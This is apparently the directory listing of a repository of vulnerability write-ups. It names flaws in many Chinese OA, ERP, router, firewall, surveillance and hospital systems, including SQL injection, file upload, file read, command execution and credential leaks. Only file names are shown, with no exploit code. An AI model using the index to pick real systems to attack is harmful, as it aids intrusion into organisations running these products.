├── 群杰印章物联网管理平台
└── 群杰印章物联网管理平台rest密码重置漏洞(XVE-2024-18945).md
├── 翰智员工服务平台
└── 翰智员工服务平台loginByPassword存在SQL注入漏洞.md
├── 联奕统一身份认证平台
└── 联奕统一身份认证平台getDataSource存在信息泄露漏洞.md
├── 联想网盘
└── 联想网盘存在任意文件上传漏洞.md
├── 联软
├── 联软安全数据交换系统任意文件读取.md
├── 联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞.md
└── 联软安渡系统接口queryLinklnfo存在SQL注入漏洞.md
├── 联达OA
├── 联达OA uploadLogo.aspx存在任意文件上传.md
├── 联达OA-UpLoadFile.aspx存在任意文件上传漏洞.md
├── 联达OA-uploadLogo.aspx存在任意文件上传.md
└── 联达OA接口uploadImg.aspx任意文件上传漏洞.md
├── 聚合支付
└── 聚合支付平台接口sdcustomno存在SQL注入漏洞.md
├── 脸爱云
├── 脸爱云一脸通智慧管理平台MoneyMng存在信息泄露漏洞.md
├── 脸爱云一脸通智慧管理平台SelOperators存在信息泄露漏洞.md
├── 脸爱云一脸通智慧管理平台SystemMng存在任意用户添加漏洞.md
├── 脸爱云一脸通智慧管理平台SystemMng存在信息泄露漏洞.md
├── 脸爱云一脸通智慧管理平台UpLoadPic存在任意文件上传漏洞.md
├── 脸爱云一脸通智慧管理平台UserMng存在信息泄露漏洞.md
└── 脸爱云一脸通智慧管理平台downloads存在信息泄露漏洞.md
├── 脸爱云一脸通智慧管理平台
├── 脸爱云 一脸通智慧管理平台任意用户添加漏洞.md
├── 脸爱云-一脸通智慧管理平台任意用户添加漏洞.md
├── 脸爱云一脸通智慧平台SelOperators信息泄露漏洞.md
├── 脸爱云一脸通智慧管理平台存在UpLoadPic.ashx文件上传漏洞.md
└── 脸爱云一脸通智慧管理平台存在downloads.aspx信息泄露漏洞.md
├── 腾狐
└── 腾狐TOS行为管理系统存在弱口令漏洞.md
├── 自助打印微信小程序系统
└── 自助打印微信小程序系统存在SQL注入漏洞.md
├── 致翔OA
└── 致翔OA系统接口open_juese存在SQL注入漏洞.md
├── 致远OA
├── 致远M1 usertokenservice 反序列化RCE漏洞.md
├── 致远M1-usertokenservice-反序列化RCE漏洞.md
├── 致远M3敏感信息泄露漏洞.md
├── 致远OA M3 Server 反序列化漏洞.md
├── 致远OA wpsAssistServlet任意文件读取漏洞.md
├── 致远OA-A8-V5接口officeservlet存在任意文件读取漏洞.md
├── 致远OA-M3-Server-反序列化漏洞.md
├── 致远OA-ucpcLogin密码重置漏洞.md
├── 致远OA-wpsAssistServlet任意文件读取漏洞.md
├── 致远OAV52019系统properties信息泄露漏洞.md
├── 致远OA_V8.1SP2文件上传漏洞.md
├── 致远OA_getAjaxDataServlet接口存在任XXE漏洞.md
├── 致远OA任意管理员登录.md
├── 致远OA前台任意用户密码修改漏洞.md
├── 致远OA后台表单导入任意文件写入漏洞.md
├── 致远OA帆软组件ReportServer目录遍历漏洞.md
├── 致远OA系统constDef接口存在代码执行漏洞.md
├── 致远oa系统saveFormula4Cloud存在JNDI注入.md
├── 致远互联-OA前台fileUpload.do存在绕过文件上传漏洞.md
├── 致远互联AnalyticsCloud分析云存在任意文件读取漏洞.md
├── 致远互联FE协作办公平台apprvaddNew存在sql注入漏洞.md
├── 致远互联FE协作办公平台codeMoreWidget.js存在sql注入漏洞.md
├── 致远互联FE协作办公平台editflow_manager存在sql注入漏洞.md
├── 致远互联FE协作办公平台ncsubjass存在SQL注入.md
└── 致远前台任意用户密码修改.md
├── 艾科思
└── 艾科思(霆智科技)应用接入系统存在任意文件读取漏洞.md
├── 苏州科达科技股份有限公司
└── 苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞.md
├── 英飞达医学影像存档与通信系统
├── 英飞达医学WebUserLogin.asmx信息泄露.md
├── 英飞达医学影像存档与通信系统Upload.asmx任意文件上传漏洞.md
└── 英飞达医学影像存档与通信系统WebJobUpload任意文件上传漏洞.md
├── 英飞达软件(上海)有限公司
└── 英飞达影像存档与通讯(PACS)系统INFINITTPACSWebJobUpload存在任意文件上传漏洞.md
├── 苹果IOS端IPA签名工具
└── 苹果IOS端IPA签名工具request_post任意文件读取漏洞.md
├── 荷花商品混凝土ERP系统
└── 荷花商品混凝土ERP系统DictionaryEdit.aspx页面存在SQL注入.md
├── 菠菜
├── 万豪娱乐存在任意文件读取漏洞.md
└── 彩票系统存在任意文件preview.php上传漏洞.md
├── 菲力尔(FLIR)
└── FLIR-AX8热成像仪res.php远程命令执行漏洞(CVE-2022-37061).md
├── 蓝凌OA
├── 某凌OA前台代码执行.md
├── 蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181).md
├── 蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞.md
├── 蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞.md
├── 蓝凌EIS智慧协同平台多个接口SQL注入.md
├── 蓝凌EKP前台授权绕过导致文件上传.md
├── 蓝凌EKP系统dataxml.tmpl存在命令执行漏洞.md
├── 蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md
├── 蓝凌EKP系统任意文件读取漏洞集合.md
├── 蓝凌EKP系统接口sysFormMainDataInsystemWebservice存在任意文件读取漏洞.md
├── 蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞.md
├── 蓝凌KEP前台RCE漏洞.md
├── 蓝凌OA treexml.tmpl 远程命令执行漏洞.md
├── 蓝凌OA-EKP系统接口hrStaffWebService存在任意文件读取漏洞.md
├── 蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞.md
├── 蓝凌OA-treexml.tmpl-远程命令执行漏洞.md
├── 蓝凌OAsysUiComponent 文件存在任意文件上传漏洞.md
└── 蓝凌OAsysUiComponent-文件存在任意文件上传漏洞.md
├── 蓝海卓越
├── 蓝海卓越计费管理系统agent_setstat存在SQL注入漏洞.md
├── 蓝海卓越计费管理系统debug存在远程命令执行漏洞.md
├── 蓝海卓越计费管理系统loaduser存在SQL注入漏洞.md
├── 蓝海卓越计费管理系统picUpLoad存在任意文件删除漏洞.md
├── 蓝海卓越计费管理系统任意文件读取漏洞.md
├── 蓝海卓越计费管理系统多漏洞导致getshell.md
└── 蓝海卓越计费管理系统存在弱口令漏洞.md
├── 蓝海卓越计费管理系统
├── 蓝海卓越计费管理系统SQL注入漏洞.md
├── 蓝海卓越计费管理系统存在debug.php远程命令执行漏洞.md
└── 蓝海卓越计费管理系统存在download.php任意文件读取漏洞.md
├── 蓝网科技临床浏览系统
└── 蓝网科技临床浏览系统-deleteStudy-SQL注入漏洞复现(CVE-2024-4257).md
├── 虚拟仿真实验室系统
└── 虚拟仿真实验室系统FileUploadServlet存在任意文件上传漏洞.md
├── 虚拟币买卖USDT场外交易所
└── 虚拟币买卖USDT场外交易所upload.do存在任意文件上传.md
├── 虹安
└── 虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md
├── 蜂信物联
└── 蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞.md
├── 西联软件
└── 西联软件移动门店管理系统treamToFile文件上传漏洞.md
├── 西软云
├── 西软云XMS-futurehotel-operate接口存在XXE漏洞.md
├── 西软云XMS-futurehotel-query接口存在XXE漏洞.md
└── 西软云XMS反序列化漏洞.md
├── 西软云XMS
├── 西软云XMSFoxLookupInvoker接口存在反序列化漏洞.md
└── 西软云XMSoperate接口存在XXE漏洞.md
├── 要塞T3管理系统
└── 要塞T3系统接口Ajax_CheckMobileRepeat存在SQL注入漏洞.md
├── 誉龙数字
├── 誉龙视音频综合管理平台FindById存在SQL注入漏洞.md
└── 誉龙视音频综合管理平台TimeSyn存在远程命令执行漏洞.md
├── 证书查询系统
└── 证书查询系统存在任意文件读取漏洞.md
├── 购物商城系统
└── 购物商城系统commodtiy存在任意SQL注入漏洞.md
├── 费浦
└── 费浦门禁出入口安防平台aDKManageUser存在未授权访问.md
├── 资管云
├── 百易云资产管理运营系统house.save.php存在SQL注入漏洞.md
├── 百易云资产管理运营系统ticket.edit.php存在SQL注入漏洞.md
├── 百易云资产管理运营系统ufile.api.php存在SQL注入漏洞.md
├── 资产管理运营系统mobilefront2前台文件上传漏洞.md
└── 资管云comfileup.php前台文件上传漏洞(XVE-2024-18154).md
├── 赛思
├── 赛思 SuccezBl前台任意文件上传.md
└── 赛思-SuccezBl前台任意文件上传.md
├── 赛普
├── 赛普EAP企业适配管理平台Download.aspx任意文件读取漏洞.md
└── 赛普EAP企业适配管理平台Upload存在任意文件上传漏洞.md
├── 赛蓝企业管理系统
├── 赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞.md
├── 赛蓝企业管理系统DownloadBuilder任意文件读取漏洞.md
├── 赛蓝企业管理系统GetCssFile存在任意文件读取漏洞.md
├── 赛蓝企业管理系统GetExcellTemperature存在SQL注入漏洞.md
├── 赛蓝企业管理系统GetImportDetailJson存在SQL注入漏洞.md
├── 赛蓝企业管理系统GetJSFile存在任意文件读取漏洞.md
├── 赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞.md
└── 赛蓝企业管理系统SubmitUploadify存在任意文件上传漏洞.md
├── 赛诸葛
└── 赛诸葛数字化智能中台系统login存在SQL注入漏洞.md
├── 超易企业管理系统
└── 超易企业管理系统Login.ashx存在SQL注入漏洞.md
├── 超级猫签名APP分发平台
├── 超级猫签名APP分发平台前台存在SQL注入漏洞.md
└── 超级猫签名APP分发平台前台远程文件写入漏洞.md
├── 路由器
├── AC集中管理平台未授权漏洞.md
├── ALR-F800存在命令执行漏洞.md
├── CERIO-DT系列路由器Save.cgi接口存在命令执行漏洞.md
├── Netgear-WN604接口downloadFile.php信息泄露漏洞(CVE-2024-6646).md
├── Netgear路由器boardDataWW.php存在RCE漏洞.md
├── T18-1TOTOLINK-A6000R-远程命令执行漏洞.md
├── TOTOLINK A3700R命令执行漏洞CVE-2023-46574.md
├── TOTOLINK-A3700R命令执行漏洞CVE-2023-46574.md
├── TOTOLINK远程代码执行漏洞(CVE-2024-51228).md
├── TP-LINKTL-WR940N 命令执行漏洞(CVE-2023-33538).md
├── TP-LINKTL-WR940N-命令执行漏洞(CVE-2023-33538).md
├── TP-Link-ER7206存在命令注入漏洞.md
├── Telesquare路由器RCE(CVE-2024-29269).md
├── WIFISKY-7层流控路由器confirm.php接口处存在RCE漏洞.md
├── draytek路由器addrouting命令执行漏洞.md
├── 中移铁通禹路由器信息泄露漏洞.md
└── 极企智能办公路由接口jumper.php存在RCE漏洞.md
├── 辰信景云
└── 辰信景云终端安全管理系统login存在SQL注入漏洞.md
├── 辰信景云终端安全管理系统
└── 某信景云终端安全管理系统存在loginSQL注入漏洞.md
├── 迈普
└── 迈普安全网关sslvpn_client存在远程命令执行漏洞.md
├── 迈普多业务融合网关
├── 迈普pnsr2900x系统接口DOWNLOAD_FILE任意文件读取漏洞.md
└── 迈普多业务融合网关send_order.cgi存在命令执行漏洞.md
├── 远秋医学在线考试系统
├── 远秋医学培训报名系统User存在未授权账号密码泄露漏洞.md
├── 远秋医学培训报名系统v1.0ManagerList存在未授权账号密码泄露漏洞.md
└── 远秋医学培训报名系统v1.0NewsDetailPage存在SQL注入漏洞.md
├── 远秋医学培训系统
└── 远秋医学培训系统未授权查看密码.md
├── 迪威讯
├── 迪威讯Focus6100音视频通讯平台存在任意用户删除.md
├── 迪威讯Focus6100音视频通讯平台存在任意用户密码修改漏洞.md
├── 迪威讯Focus6100音视频通讯平台存在任意用户添加漏洞.md
├── 迪威讯Focus6100音视频通讯平台存在敏感信息泄露漏洞.md
└── 迪威讯Focus6100音视频通讯平台存在默认口令.md
├── 迪普
├── 迪普DPTech VPN 任意文件读取.md
├── 迪普DPTech-VPN-任意文件读取.md
├── 迪普DPTech-VPN任意文件读取(补丁绕过).md
└── 迪普VPN文件读取漏洞.md
├── 通天星
├── 通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞.md
├── 通天星CMSV6接口pointManage存在SQL注入.md
├── 通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744).md
├── 通天星CMSV6车载定位监控平台getAlarmAppealByGuid存在SQL注入漏洞.md
├── 通天星CMSV6车载视频监控平台SESSION伪造漏洞.md
├── 通天星CMSV6车载视频监控平台disable存在SQL注入.md
├── 通天星CMSV6车载视频监控平台downloadLogger接口任意文件读取漏洞.md
├── 通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞.md
├── 通天星CMSV6车载视频监控平台xz_center信息泄露漏洞.md
└── 鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞.md
├── 通天星CMSV6
├── 通天星CMSV6车载视频监控平台MobileAction_downLoad存在任意文件下载漏洞.md
├── 通天星CMSV6车载视频监控平台SelectDevAction_loadServerLoggerFile存在信息泄露漏洞.md
├── 通天星CMSV6车载视频监控平台SelectDevAction_loadWebLoggerFile存在信息泄露漏洞.md
├── 通天星CMSV6车载视频监控平台StandardApiAction_findCompanyList存在信息泄露漏洞.md
├── 通天星CMSV6车载视频监控平台StandardApiAction_vehicleTTS存在SQL注入漏洞.md
├── 通天星CMSV6车载视频监控平台StandardLoginAction_getAllUser存在信息泄露漏洞.md
├── 通天星CMSV6车载视频监控平台StandardReportMediaAction_getImage存在任意文件读取漏洞.md
├── 通天星CMSV6车载视频监控平台complex存在SQL注入漏洞.md
├── 通天星CMSV6车载视频监控平台disable存在SQL注入漏洞.md
├── 通天星CMSV6车载视频监控平台dismiss_disable存在SQL注入漏洞.md
├── 通天星CMSV6车载视频监控平台downloadLogger任意文件下载.md
├── 通天星CMSV6车载视频监控平台druid存在默认口令漏洞.md
├── 通天星CMSV6车载视频监控平台edu_class_delete存在SQL注入漏洞.md
├── 通天星CMSV6车载视频监控平台edu_course_publish_revoke存在SQL注入漏洞.md
├── 通天星CMSV6车载视频监控平台edu_plan_publish_revoke存在SQL注入漏洞.md
├── 通天星CMSV6车载视频监控平台getAlarmAppealByGuid存在SQL注入漏洞.md
├── 通天星CMSV6车载视频监控平台inspect_file存在任意文件上传漏洞.md
├── 通天星CMSV6车载视频监控平台kq_schedule存在SQL注入漏洞.md
├── 通天星CMSV6车载视频监控平台line_manage存在SQL注入漏洞.md
├── 通天星CMSV6车载视频监控平台list存在SQL注入漏洞.md
├── 通天星CMSV6车载视频监控平台list存在信息泄露漏洞.md
├── 通天星CMSV6车载视频监控平台merge存在SQL注入漏洞.md
├── 通天星CMSV6车载视频监控平台muck_vehi_certificate存在SQL注入漏洞.md
├── 通天星CMSV6车载视频监控平台run_stop_delete存在SQL注入漏洞.md
└── 通天星CMSV6车载视频监控平台task_record_detail_delete存在SQL注入漏洞.md
├── 通达OA
├── 通达OA down.php接口存在未授权访问漏洞.md
├── 通达OA get_datas.php前台sql注入.md
├── 通达OA header身份认证绕过漏洞.md
├── 通达OA sql注入漏洞 CVE-2023-4165.md
├── 通达OA sql注入漏洞 CVE-2023-4166.md
├── 通达OA-WHERE_STR存在前台SQL注入漏洞.md
├── 通达OA-down.php接口存在未授权访问漏洞.md
├── 通达OA-get_datas.php前台sql注入.md
├── 通达OA-header身份认证绕过漏洞.md
├── 通达OA-sql注入漏洞-CVE-2023-4165.md
├── 通达OA-sql注入漏洞-CVE-2023-4166.md
├── 通达OAV11.10接口login.php存在SQL注入漏洞.md
└── 通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600).md
├── 速达软件
└── 速达软件全系产品存在任意文件上传漏洞.md
├── 速达软件技术(广州)有限公司
├── 速达软件技术(广州)有限公司多款产品doGetAccsetList存在JNID注入漏洞.md
├── 速达软件技术(广州)有限公司多款产品doSavePrintTpl存在JNID注入漏洞.md
├── 速达软件技术(广州)有限公司多款产品doSavePrintTpl存在SQL注入漏洞.md
├── 速达软件技术(广州)有限公司多款产品home_jsontest存在JNID注入漏洞.md
├── 速达软件技术(广州)有限公司多款产品voucherauditdo存在JNID注入漏洞.md
├── 速达软件技术(广州)有限公司多款产品存在代码执行.md
└── 速达软件技术(广州)有限公司多款产品存在文件上传漏洞.md
├── 邦永PM2
└── 邦永PM2项目管理系统Global_UserLogin.aspxSQL注入漏洞.md
├── 邦永PM2项目管理系统
├── 邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞.md
└── 邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞.md
├── 郑州时空智友信息技术有限公司
├── 时空WMS-仓储精细化管理系统ImageAdd存在文件上传漏洞.md
└── 时空WMS-仓储精细化管理系统SaveCrash存在文件上传漏洞.md
├── 金万维-云联应用系统
└── 金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞.md
├── 金华迪加
└── 金华迪加现场大屏互动系统mobile.do.php任意文件上传漏洞.md
├── 金华迪加网络科技有限公司
└── 金华迪加网络科技有限公司现场大屏互动系统mobile.do.php接口存在文件上传漏洞.md
├── 金和OA
├── 某和OA-C6-GetSqlData.aspx-SQL注入漏洞.md
├── 金和JC6协同管理平台oaplusrangedownloadfile存在文件下载漏洞.md
├── 金和OA jc6 clobfield SQL注入漏洞.md
├── 金和OA-C6-GeneralXmlhttpPage.aspx存在SQL注入漏洞.md
├── 金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞.md
├── 金和OA-C6-download.jsp任意文件读取漏洞.md
├── 金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞.md
├── 金和OA-C6接口DownLoadBgImage存在任意文件读取漏洞.md
├── 金和OA-C6系统接口ApproveRemindSetExec.aspx存在XXE漏洞(CNVD-2024-40568).md
├── 金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞.md
├── 金和OA-C6系统接口jQueryUploadify.ashx存在SQL注入漏洞.md
├── 金和OA-jc6-clobfield-SQL注入漏洞.md
├── 金和OAC6-FileDownLoad.aspx任意文件读取漏洞.md
├── 金和OAC6-GetSqlData.aspx存在SQL注入漏洞.md
├── 金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞.md
├── 金和OA_CarCardInfo.aspx_SQL注入漏洞.md
├── 金和OA_HomeService.asmxSQL注入.md
├── 金和OA_MailTemplates.aspx_SQL注入漏洞.md
├── 金和OA_SAP_B1Config.aspx未授权访问漏洞.md
├── 金和OA_jc6_Upload任意文件上传.md
├── 金和OA_jc6_ntko-upload任意文件上传漏洞.md
├── 金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞.md
├── 金和OA_upload_json.asp存在任意文件上传漏洞.md
├── 金和OA_uploadfileeditorsave接口存在任意文件上传漏洞.md
├── 金和OA任意文件读取漏洞.md
└── 金和OA系统接口SignUpload.ashx存在SQL注入漏洞.md
├── 金山
├── 金山EDR RCE漏洞.md
├── 金山EDR-RCE漏洞.md
├── 金山VGM防毒墙downFile存在任意文件读取漏洞.md
├── 金山WPS RCE.md
├── 金山WPS-RCE.md
├── 金山云EDR任意文件上传漏洞.md
├── 金山终端安全系统V9.0 SQL注入漏洞.md
├── 金山终端安全系统V9.0-SQL注入漏洞.md
├── 金山终端安全系统V9.0SQL注入漏洞.md
├── 金山终端安全系统V9.0任意用户添加漏洞.md
└── 金山终端安全系统V9任意文件上传漏洞.md
├── 金慧
├── 金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞.md
└── 金慧综合管理信息系统LoginBegin存在sql注入漏洞.md
├── 金慧综合管理信息系统
└── 金慧综合管理信息系统LoginBegin.aspx存在SQL注入漏洞.md
├── 金斗云
├── 金斗云-HKMP智慧商业软件download任意文件读取漏洞.md
├── 金斗云-HKMP智慧商业软件任意用户添加漏洞.md
└── 金斗云HKMP智慧商业软件queryPrintTemplate存在SQL注入漏洞.md
├── 金盘
├── 金盘图书馆系统
│ ├── 金盘图书馆系统doUpload存在任意文件上传漏洞.md
│ └── 金盘图书馆系统download存在任意文件下载漏洞.md
├── 金盘微信管理平台
│ └── 金盘微信管理平台getsysteminfo接口未授权访问漏洞.md
├── 金盘微信管理平台download.jsp任意文件读取漏洞.md
├── 金盘移动图书馆系统download.jsp存在任意文件读取漏洞.md
├── 金盘移动图书馆系统upload存在任意文件上传漏洞.md
└── 金盘移动图书馆系统存在任意文件上传漏洞.md
├── 金盘移动图书馆系统
└── 金盘移动图书馆系统存在任意文件上传漏洞.md
├── 金石工程项目管理系统
└── 金石工程项目管理系统TianBaoJiLu.aspx存在SQL注入漏洞.md
├── 金蝶
├── 金蝶Apusic应用服务器loadTree JNDI注入漏洞.md
├── 金蝶Apusic应用服务器loadTree-JNDI注入漏洞.md
├── 金蝶Apusic应用服务器任意文件上传.md
├── 金蝶EAS myUploadFile任意文件上传.md
├── 金蝶EAS-myUploadFile任意文件上传.md
├── 金蝶EAS_pdfviewlocal任意文件读取漏洞.md
├── 金蝶EAS存在appUtil.jsp命令执行漏洞.md
├── 金蝶OA-EAS系统 uploadLogo.action 任意文件上传漏洞.md
├── 金蝶OA-EAS系统-uploadLogo.action-任意文件上传漏洞.md
├── 金蝶OA云星空 ScpSupRegHandler 任意文件上传漏洞.md
├── 金蝶OA云星空-ScpSupRegHandler-任意文件上传漏洞.md
├── 金蝶云-星空ServiceGateway反序列化漏洞.md
├── 金蝶云星空 CommonFileserver 任意文件读取漏洞.md
├── 金蝶云星空-CommonFileserver-任意文件读取漏洞.md
├── 金蝶云星空UserService反序列化漏洞.md
└── 金蝶星空云K3Cloud反序列化漏洞.md
├── 鑫塔
└── 鑫塔第二代防火墙sslvpn_client存在远程命令执行漏洞.md
├── 铭飞
├── 铭飞CMS list接口存在SQL注入.md
├── 铭飞CMS-list接口存在SQL注入.md
├── 铭飞CMS-search接口存在sql注入漏洞.md
└── 铭飞MCMS接口upload.do存在任意文件上传漏洞.md
├── 锁群管理系统
└── 锁群管理系统存在逻辑缺陷漏洞.md
├── 锐捷
├── RG-UAC锐捷统一上网行为管理与审计系统存在远程代码执行漏洞.md
├── 星网锐捷
│ ├── 星网锐捷DMB-BSLED屏信息发布系统taskexport接口处存在敏感信息泄露.md
│ └── 星网锐捷视频话机设备pwdsetting管理密码泄漏.md
├── 锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞.md
├── 锐捷-EG易网关存在RCE漏洞.md
├── 锐捷-NBR-路由器-fileupload.php-任意文件上传漏洞.md
├── 锐捷AC无线控制器
│ └── 锐捷AC无线控制器存在命令执行漏洞.md
├── 锐捷EG易网关
│ ├── 锐捷EG易网关branch_import存在后台远程命令执行漏洞.md
│ ├── 锐捷EG易网关branch_passw.php远程代码执行漏洞.md
│ ├── 锐捷EG易网关cli存在后台远程命令执行漏洞.md
│ ├── 锐捷EG易网关download.php后台任意文件读取漏洞.md
│ ├── 锐捷EG易网关export后台任意文件写入.md
│ ├── 锐捷EG易网关login.php敏感信息泄露.md
│ ├── 锐捷EG易网关networksafe远程代码执行漏洞.md
│ ├── 锐捷EG易网关phpinfo.view.php信息泄露漏洞.md
│ ├── 锐捷EG易网关timeout.php后台任意文件读取漏洞.md
│ ├── 锐捷EG易网关vpn_quickset_service远程代码执行漏洞.md
│ ├── 锐捷EG易网关wifi.php存在后台远程命令执行漏洞.md
│ └── 锐捷EG易网关管理员账号密码泄露漏洞.md
├── 锐捷NBR系列路由器存在管理员密码重置漏洞.md
├── 锐捷RG-EW1200G无线路由器登录绕过.md
├── 锐捷RG-ISG
│ └── 锐捷RG-ISG账号密码泄露漏洞.md
├── 锐捷RG-NBS2026G-P交换机WEB管理ping.htm未授权访问漏洞.md
├── 锐捷RG-UAC应用网关
│ ├── 锐捷RG-UAC应用网关nmc_sync.php前台RCE漏洞.md
│ ├── 锐捷RG-UAC应用网关online_check.php前台RCE漏洞.md
│ ├── 锐捷RG-UAC应用网关static_convert.php前台RCE漏洞.md
│ ├── 锐捷RG-UAC统一上网行为管理审计系统detail后台命令执行漏洞.md
│ ├── 锐捷RG-UAC统一上网行为管理审计系统gre_add_commit后台命令执行漏洞.md
│ ├── 锐捷RG-UAC统一上网行为管理审计系统gre_edit后台命令执行漏洞.md
│ ├── 锐捷RG-UAC统一上网行为管理审计系统interface_commit后台命令执行漏洞.md
│ ├── 锐捷RG-UAC统一上网行为管理审计系统ip_addr_add_commit后台命令执行漏洞.md
│ ├── 锐捷RG-UAC统一上网行为管理审计系统oldipmask后台命令执行漏洞.md
│ ├── 锐捷RG-UAC统一上网行为管理审计系统static_route_edit_commit后台命令执行漏洞.md
│ ├── 锐捷RG-UAC统一上网行为管理审计系统text_ip_addr后台命令执行漏洞.md
│ ├── 锐捷RG-UAC统一上网行为管理审计系统text_prefixlen后台命令执行漏洞.md
│ ├── 锐捷RG-UAC统一上网行为管理审计系统信息泄漏漏洞.md
│ └── 锐捷RG-UAC统一上网行为管理审计系统账号密码泄漏漏洞.md
├── 锐捷RG-UAC统一上网行为管理与审计系统管理员密码泄露.md
├── 锐捷RG-UAC统一上网行为管理审计系统online.php存在远程代码执行.md
├── 锐捷RG-UAC统一上网行为管理审计系统static_route_edit_ipv6.php存在远程代码执行.md
├── 锐捷RG-UAC统一上网行为管理审计系统sub_commit.php存在远程代码执行.md
├── 锐捷RG-UAC统一上网行为管理审计系统user_commit.php存在远程代码执行.md
├── 锐捷RG-UAC统一上网行为管理审计系统vlan_add_commit.php存在远程代码执行.md
├── 锐捷SSLVPN
│ └── 锐捷RGSSLVPN垂直越权漏洞.md
├── 锐捷Smartweb管理系统密码
│ ├── 锐捷Smartweb管理系统命令注入漏洞.md
│ └── 锐捷Smartweb管理系统密码信息泄漏漏洞.md
├── 锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞.md
├── 锐捷云课堂主机
│ └── 锐捷云课堂主机存在目录遍历漏洞.md
├── 锐捷交换机WEB管理系统
│ ├── 锐捷Smartweb管理系统密码信息泄露漏洞CNVD-2021-17369.md
│ └── 锐捷交换机WEB管理系统EXCU_SHELL密码信息泄漏漏洞.md
├── 锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116).md
├── 锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞补丁绕过.md
├── 锐捷校园网自助服务系统operatorReportorRoamService存在SQL注入漏洞.md
├── 锐捷系统接口auth存在远程命令执行漏洞.md
├── 锐捷网络flwo.control.php存在RCE漏洞.md
├── 锐捷网络无线AC命令执行.md
├── 锐捷网络股份有限公司校园网自助服务系统
│ ├── 锐捷网络股份有限公司校园网自助服务系统findOperatorOnlineUserCount24Hours存在SQL注入漏洞.md
│ └── 锐捷网络股份有限公司校园网自助服务系统queryAccountNumReportDataDetail存在SQL注入漏洞.md
└── 锐捷路由器
│ ├── 锐捷EWEBflwo.contro存在远程命令执行漏洞.md
│ ├── 锐捷EWEB路由器auth远程命令执行漏洞.md
│ ├── 锐捷EWEB路由器timeout.php任意文件上传漏洞.md
│ ├── 锐捷NBR系列多款路由器存在管理员密码重置漏洞.md
│ ├── 锐捷NBR路由器fileupload.php任意文件上传漏洞.md
│ ├── 锐捷NBR路由器guestIsUp.php远程命令执行漏洞.md
│ ├── 锐捷RG-BCR860路由器命令执行漏洞(CVE-2023-3450).md
│ ├── 锐捷RG-EW1200G路由器后台命令执行.md
│ ├── 锐捷RG-EW1200G路由器未授权任意密码修改.md
│ └── 锐捷RG-EW1200G路由器登录绕过(CVE-2023-4415).md
├── 锐明技术Crocus系统
├── 锐明技术Crocus系统Service.do任意文件读取漏洞.md
└── 锐明技术Mangrove系统任意用户创建漏洞.md
├── 防火墙产品
└── 多个防火墙产品RCE.md
├── 青藤云 EDR
└── 青藤云 EDR 权限提升漏洞.md
├── 青藤云-EDR
└── 青藤云-EDR-权限提升漏洞.md
├── 青铜器RDM研发管理平台
└── 青铜器RDM研发管理平台upload存在任意文件上传漏洞.md
├── 顺景ERP
├── 顺景ERP管理系统FileUpload存在任意文件上传漏洞.md
├── 顺景ERP管理系统UploadInvtSpBuzPlanFile存在任意文件上传漏洞.md
├── 顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞.md
├── 顺景ERP系统FullGuidFileName任意文件读取漏洞.md
└── 顺景ERP系统GetFile任意文件读取漏洞.md
├── 风速科技统一认证平台
└── 风速科技统一认证平台存在密码重置漏洞.md
├── 飞企互联
├── ⻜企互联loginService任意登录.md
├── 飞企互联 FE 业务协作平台存在参数文件读取漏洞 .md
├── 飞企互联-FE-业务协作平台存在参数文件读取漏洞-.md
├── 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md
├── 飞企互联-FE企业运营管理平台_efficientCodewidget39接口SQL注入漏洞.md
├── 飞企互联-FE企业运营管理平台publicData.jsp存在SQL注入漏洞.md
├── 飞企互联-FE企业运营管理平台treeXml.jsp存在SQL注入漏洞.md
├── 飞企互联-FE企业运营管理平台uploadAttachmentServlet存在任意文件上传漏洞.md
├── 飞企互联-FE企业运营管理平台登录绕过漏洞.md
├── 飞企互联FE企业运营管理平台ajax_codewidget39.jsp接口存在SQL注入漏洞.md
├── 飞企互联FE企业运营管理平台checkGroupCode.js接口存在SQL注入漏洞.md
└── 飞企互联Ognl表达式注入导致RCE.md
├── 飞讯云
├── 飞讯云MyImportData前台SQL注入(XVE-2024-18113).md
└── 飞讯云供应链平台MyImportData前台SQL注入.md
├── 飞鱼星
├── 飞鱼星-路由器存在敏感信息泄露漏洞.md
├── 飞鱼星上网行为管理系统企业版前台RCE.md
├── 飞鱼星下一代防火墙安全网关
│ └── 飞鱼星下一代防火墙安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md
├── 飞鱼星家用智能路由
│ ├── 飞鱼星家用智能路由存在敏感信息泄露漏洞.md
│ └── 飞鱼星家用智能路由存在权限绕过漏洞.md
└── 飞鱼星智能上网行为管理系统
│ ├── 飞鱼星智能上网行为管理系统send_order存在远程命令执行漏洞.md
